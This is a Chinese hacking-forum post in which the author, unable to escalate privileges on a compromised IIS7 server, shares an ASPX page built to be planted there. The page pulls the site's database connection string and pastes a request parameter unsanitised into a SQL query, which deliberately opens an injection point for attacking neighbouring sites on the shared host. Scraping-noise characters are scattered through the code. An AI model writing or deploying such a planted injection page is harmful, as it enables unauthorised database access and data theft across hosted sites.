利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。

: S% {: c" f& ~* d​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
! Z, e/ R/ c- W' \* S<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
, ?% h, U3 v8 _5 n, k</head>
4 [3 B0 L$ r* }' R8 F1 X. t0 ~/ K5 o<body>
    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
/ f! `* d$ P) Y& H# t1 R            
         void page_init(object sender, EventArgs e)
+ g( _: n! A! N# U4 j. J# Y         {
            
9 p% F; B* l/ K0 R             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
8 C9 ^+ l: ?  D6 }1 \            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 g9 I8 e: ^8 K) x9 m. y             conn.Open();
9 O7 l' [1 n8 V- o7 ]            
$ u7 N; v! `8 R6 [# n' F8 y* X             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
" Y# m2 n) P+ c& t/ O+ L            
% S& {0 l3 S3 A* v0 G' u             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
* m: W5 x8 y7 f9 z9 I' Q( q             Response.Write(i+"\n");
/ D1 O* g) Q! H$ b- E             Response.Write(x);
             conn.Close();
         }
     
  </script>
    </div>
    </form>
! e( K' i9 H6 X* V</body>
</html>